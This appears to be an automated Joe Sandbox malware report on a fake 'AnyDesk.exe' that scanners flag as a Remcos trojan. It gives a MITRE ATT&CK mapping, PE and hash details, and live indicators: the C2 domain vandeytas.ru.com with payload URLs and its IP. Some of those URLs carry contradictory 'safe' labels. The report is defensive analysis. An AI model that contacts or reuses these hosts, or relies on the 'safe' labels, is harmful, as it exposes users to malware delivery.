Code function: 0_2_02B2920C GetLocalTime,

0_2_02B2920C

Source: C:\Users\user\Desktop\AnyDesk.exe

Code function: 0_2_02B2B78C GetVersionExA,

0_2_02B2B78C

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	1 Valid Accounts	1 Native API	1 Valid Accounts	1 Valid Accounts	1 Valid Accounts	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 Access Token Manipulation	1 Access Token Manipulation	LSASS Memory	1 Query Registry	Remote Desktop Protocol	Data from Removable Media	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Virtualization/Sandbox Evasion	Security Account Manager	111 Security Software Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	1 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	114 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	2 Obfuscated Files or Information	LSA Secrets	1 System Network Connections Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	24 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
AnyDesk.exe	66%	ReversingLabs	Win32.Trojan.Remcos
AnyDesk.exe	32%	Virustotal		Browse

Source	Detection	Scanner	Label	Link
vandeytas.ru.com	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
https://vandeytas.ru.com/233_Hlvzmhuinffg	0%	Avira URL Cloud	safe
https://vandeytas.ru.com/233_Hlvzmhuinffi	0%	Avira URL Cloud	safe
https://vandeytas.ru.com/233_Hlvzmhuinff	0%	Avira URL Cloud	safe
https://vandeytas.ru.com/233_HlvzmhuinffL	0%	Avira URL Cloud	safe
https://vandeytas.ru.com/l	0%	Avira URL Cloud	safe
https://vandeytas.ru.com/233_HlvzmhuinffX	0%	Avira URL Cloud	safe
https://vandeytas.ru.com/D	0%	Avira URL Cloud	safe
https://vandeytas.ru.com:443/233_Hlvzmhuinff	0%	Avira URL Cloud	safe
https://vandeytas.ru.com/233_Hlvzmhuinff0	0%	Avira URL Cloud	safe
https://vandeytas.ru.com/233_Hlv	0%	Avira URL Cloud	safe
https://vandeytas.ru.com/233_HlvzmhuinffLL	0%	Avira URL Cloud	safe
https://vandeytas.ru.com/233_HlvzmhuinffT	0%	Avira URL Cloud	safe
https://vandeytas.ru.com/	0%	Avira URL Cloud	safe
https://vandeytas.ru.com/233_Hlvzmhuinffi	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
vandeytas.ru.com	50.7.187.218	true	true	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://vandeytas.ru.com/233_Hlvzmhuinff	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://vandeytas.ru.com/233_Hlvzmhuinffg	AnyDesk.exe, 00000000.00000003.2734850198.0000000000642000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000002.3366823048.000000000063C000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000003.2474569149.000000000063E000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000003.2668808919.0000000000642000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://vandeytas.ru.com/233_Hlvzmhuinffi	AnyDesk.exe, 00000000.00000003.2734850198.0000000000649000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000003.2188445742.000000000063C000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://vandeytas.ru.com/233_HlvzmhuinffL	AnyDesk.exe, 00000000.00000002.3382847342.00000000214E0000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000003.2495985049.0000000000642000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://vandeytas.ru.com/l	AnyDesk.exe, 00000000.00000003.2734850198.0000000000642000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://vandeytas.ru.com/233_HlvzmhuinffX	AnyDesk.exe, 00000000.00000003.2344442230.00000000005F9000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000002.3366823048.00000000005F9000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000002.3366823048.000000000058E000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000003.2474569149.00000000005F9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://vandeytas.ru.com/D	AnyDesk.exe, 00000000.00000003.2343804811.0000000000644000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://vandeytas.ru.com/d	AnyDesk.exe, 00000000.00000003.2734850198.0000000000642000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://vandeytas.ru.com:443/233_Hlvzmhuinff	AnyDesk.exe, 00000000.00000002.3366823048.000000000058E000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000003.2734850198.0000000000653000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.pmail.com	AnyDesk.exe, AnyDesk.exe, 00000000.00000002.3368560990.0000000002B4E000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000002.3383259657.000000007F9FF000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000003.2120740305.000000007F880000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000002.3368038850.0000000002AAC000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000003.2120469469.0000000002872000.00000004.00000020.00020000.00000000.sdmp	false		high
https://vandeytas.ru.com/233_Hlvzmhuinff0	AnyDesk.exe, 00000000.00000002.3366823048.000000000058E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://vandeytas.ru.com/233_Hlv	AnyDesk.exe, 00000000.00000002.3382171324.000000002090D000.00000004.00001000.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://vandeytas.ru.com/233_HlvzmhuinffLL	AnyDesk.exe, 00000000.00000002.3382847342.00000000214E0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://vandeytas.ru.com/233_HlvzmhuinffT	AnyDesk.exe, 00000000.00000002.3382847342.00000000214E0000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000002.3366823048.00000000005D5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://vandeytas.ru.com/	AnyDesk.exe, 00000000.00000002.3366823048.000000000063C000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000003.2517737691.0000000000644000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000003.2474569149.000000000063E000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000003.2668808919.0000000000642000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000003.2256562401.0000000000644000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000003.2343804811.0000000000644000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000000.00000003.2188445742.0000000000646000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
50.7.187.218	vandeytas.ru.com	United States		174	COGENT-174US	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1562860
Start date and time:	2024-11-26 08:10:11 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 17s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	5
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	AnyDesk.exe
Detection:	MAL
Classification:	mal76.troj.evad.winEXE@1/0@2/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 22 Number of non-executed functions: 40
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
02:11:04	API Interceptor	57x Sleep call for process: AnyDesk.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
50.7.187.218	orig.eml.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	frsdragoz.za.com/OcrwNAZDnF56.bin
	orig.eml.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	frsdragoz.za.com/rXdAJWw196.bin
	3LxMjr9QIE.exe	Get hash	malicious	GuLoader	Browse	nughtofknifes.sa.com/EXuKqCxfBTYzW21.bin
	uzFrAkagaX.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	fwegwr.mypi.co/VkWGOQHXLDVTaJQLdaFnQRmo158.bin
	SARAY_RECEIPT.exe	Get hash	malicious	FormBook, GuLoader	Browse	fwegwr.mypi.co/gzkFUeaICJGODOkRr58.bin

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
COGENT-174US	fbot.sh4.elf	Get hash	malicious	Mirai, Moobot	Browse	38.57.189.73
	fbot.x86.elf	Get hash	malicious	Mirai, Moobot	Browse	38.10.97.97
	fbot.arm7.elf	Get hash	malicious	Mirai, Moobot	Browse	154.42.81.20
	fbot.mips.elf	Get hash	malicious	Mirai, Moobot	Browse	38.89.2.58
	ZwmyzMxFKL.exe	Get hash	malicious	BlackMoon	Browse	206.238.43.118
	ZwmyzMxFKL.exe	Get hash	malicious	BlackMoon	Browse	206.238.43.118
	Payment-251124.exe	Get hash	malicious	FormBook	Browse	38.181.21.178
	la.bot.sh4.elf	Get hash	malicious	Unknown	Browse	154.49.45.52
	la.bot.arm5.elf	Get hash	malicious	Unknown	Browse	38.166.98.107
	la.bot.mipsel.elf	Get hash	malicious	Unknown	Browse	38.214.239.244

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	file.exe	Get hash	malicious	Unknown	Browse	50.7.187.218
	file.exe	Get hash	malicious	Unknown	Browse	50.7.187.218
	file.exe	Get hash	malicious	PureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	50.7.187.218
	file.exe	Get hash	malicious	LummaC Stealer	Browse	50.7.187.218
	file.exe	Get hash	malicious	LummaC Stealer	Browse	50.7.187.218
	file.exe	Get hash	malicious	Unknown	Browse	50.7.187.218
	file.exe	Get hash	malicious	Unknown	Browse	50.7.187.218
	file.exe	Get hash	malicious	Unknown	Browse	50.7.187.218
	file.exe	Get hash	malicious	Unknown	Browse	50.7.187.218
	file.exe	Get hash	malicious	LummaC Stealer	Browse	50.7.187.218

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.222011374672291
TrID:	Win32 Executable (generic) a (10002005/4) 99.81% Windows Screen Saver (13104/52) 0.13% Win16/32 Executable Delphi generic (2074/23) 0.02% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02%
File name:	AnyDesk.exe
File size:	1'299'968 bytes
MD5:	bceea9753420a675af68cda43864438e
SHA1:	0823f156da4f106a26b5738cf9f732d5dd68cdd8
SHA256:	b6a6a59c8b8387233be03bb2111830d4e8aafec6a62a290090ae75cbff5736ec
SHA512:	8dcd35be032e853bc785615e63993deb71fa2ef35a20db9427c2a281f20ea4768b3754b4887d212cc5867ee36e470d47e33a7333cc9ca0a22196ff8371e51490
SSDEEP:	24576:Ien4s+Jv82wO5m5jAyTgz1Camim9U/ZxvneUy6/1D+TzxF1Yb:IG+cc5z1CadUUXtSTr
TLSH:	1F55BF3271A5A4B6E92B32728C1F538F45DD2530DE332C221FE56EDC5F623522B2A176
File Content Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

File Icon


Icon Hash:	474726342a2a1343

Static PE Info

General

Entrypoint:	0x45d7ac
Entrypoint Section:	.itext
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
DLL Characteristics:
Time Stamp:	0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	81dac283d2666612d5243f1d723c74b3

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
add esp, FFFFFFF0h
mov eax, 0045C168h
call 00007F77FC849275h
mov eax, dword ptr [0052ED44h]
mov eax, dword ptr [eax]
call 00007F77FC8966B1h
mov ecx, dword ptr [0052EE40h]
mov eax, dword ptr [0052ED44h]
mov eax, dword ptr [eax]
mov edx, dword ptr [0045BE7Ch]
call 00007F77FC8966B1h
mov eax, dword ptr [0052ED44h]
mov eax, dword ptr [eax]
call 00007F77FC896725h
call 00007F77FC847018h
lea eax, dword ptr [eax+00h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x133000	0x255e	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x13f000	0x7800	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x138000	0x64d0	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x137000	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x133710	0x5d0	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x5b3e8	0x5b400	11d9a1ad82710b004f88fefb1b43a473	False	0.5216502568493151	data	6.532039173610071	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.itext	0x5d000	0x7f4	0x800	4e6a486d38524f379d654a5032b1c97a	False	0.6318359375	data	6.267300121979772	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x5e000	0xd0ee4	0xd1000	b121f2834ba7999d63d8841de9b19a62	False	0.5787429444527512	data	7.107869043221469	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss	0x12f000	0x36a0	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x133000	0x255e	0x2600	de36ad3e8b271db87f50a25f77b8b7d6	False	0.31918174342105265	data	5.027445121625309	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x136000	0x34	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x137000	0x18	0x200	892eeb2b39c521d2beff0d03ca1c4936	False	0.05078125	data	0.2108262677871819	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x138000	0x64d0	0x6600	87cbef9ec6754ef0e319a8f09d25222c	False	0.6569010416666666	data	6.691214029436303	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc	0x13f000	0x7800	0x7800	e43dbb8658adbe16c2c791d590ba9f92	False	0.27972005208333334	data	4.972863110900973	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_CURSOR	0x13fa88	0x134	Targa image data - Map 64 x 65536 x 1 +32 "\001"	English	United States	0.38636363636363635
RT_CURSOR	0x13fbbc	0x134	data	English	United States	0.4642857142857143
RT_CURSOR	0x13fcf0	0x134	data	English	United States	0.4805194805194805
RT_CURSOR	0x13fe24	0x134	data	English	United States	0.38311688311688313
RT_CURSOR	0x13ff58	0x134	data	English	United States	0.36038961038961037
RT_CURSOR	0x14008c	0x134	data	English	United States	0.4090909090909091
RT_CURSOR	0x1401c0	0x134	Targa image data - RGB 64 x 65536 x 1 +32 "\001"	English	United States	0.4967532467532468
RT_BITMAP	0x1402f4	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.43103448275862066
RT_BITMAP	0x1404c4	0x1e4	Device independent bitmap graphic, 36 x 19 x 4, image size 380	English	United States	0.46487603305785125
RT_BITMAP	0x1406a8	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.43103448275862066
RT_BITMAP	0x140878	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.39870689655172414
RT_BITMAP	0x140a48	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.4245689655172414
RT_BITMAP	0x140c18	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.5021551724137931
RT_BITMAP	0x140de8	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.5064655172413793
RT_BITMAP	0x140fb8	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.39655172413793105
RT_BITMAP	0x141188	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.5344827586206896
RT_BITMAP	0x141358	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.39655172413793105
RT_BITMAP	0x141528	0xe8	Device independent bitmap graphic, 16 x 16 x 4, image size 128	English	United States	0.4870689655172414
RT_ICON	0x141610	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 4999 x 4999 px/m			0.20560165975103734
RT_DIALOG	0x143bb8	0x52	data			0.7682926829268293
RT_DIALOG	0x143c0c	0x52	data			0.7560975609756098
RT_STRING	0x143c60	0x170	data			0.4945652173913043
RT_STRING	0x143dd0	0x2b4	data			0.476878612716763
RT_STRING	0x144084	0xb4	data			0.6888888888888889
RT_STRING	0x144138	0xe8	data			0.6422413793103449
RT_STRING	0x144220	0x2a8	data			0.4764705882352941
RT_STRING	0x1444c8	0x3e8	data			0.382
RT_STRING	0x1448b0	0x370	data			0.4022727272727273
RT_STRING	0x144c20	0x3cc	data			0.33539094650205764
RT_STRING	0x144fec	0x214	data			0.49624060150375937
RT_STRING	0x145200	0xcc	data			0.6274509803921569
RT_STRING	0x1452cc	0x194	data			0.5643564356435643
RT_STRING	0x145460	0x3c4	data			0.3288381742738589
RT_STRING	0x145824	0x338	data			0.42961165048543687
RT_STRING	0x145b5c	0x294	data			0.42424242424242425
RT_RCDATA	0x145df0	0x10	data			1.5
RT_RCDATA	0x145e00	0x360	data			0.6724537037037037
RT_RCDATA	0x146160	0x44c	Delphi compiled form 'TForm1'			0.5054545454545455
RT_GROUP_CURSOR	0x1465ac	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.25
RT_GROUP_CURSOR	0x1465c0	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.25
RT_GROUP_CURSOR	0x1465d4	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x1465e8	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x1465fc	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x146610	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x146624	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_ICON	0x146638	0x14	data			1.25

Imports

DLL	Import
oleaut32.dll	SysFreeString, SysReAllocStringLen, SysAllocStringLen
advapi32.dll	RegQueryValueExA, RegOpenKeyExA, RegCloseKey
user32.dll	GetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA
kernel32.dll	GetACP, Sleep, VirtualFree, VirtualAlloc, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, CompareStringA, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
kernel32.dll	TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
user32.dll	CreateWindowExA, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageW, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageW, IsDialogMessageA, IsChild, IsCharUpperW, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClientRect, GetClassLongA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
gdi32.dll	UnrealizeObject, StretchBlt, SetWindowOrgEx, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectA, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, ExcludeClipRect, DeleteObject, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, BitBlt
version.dll	VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
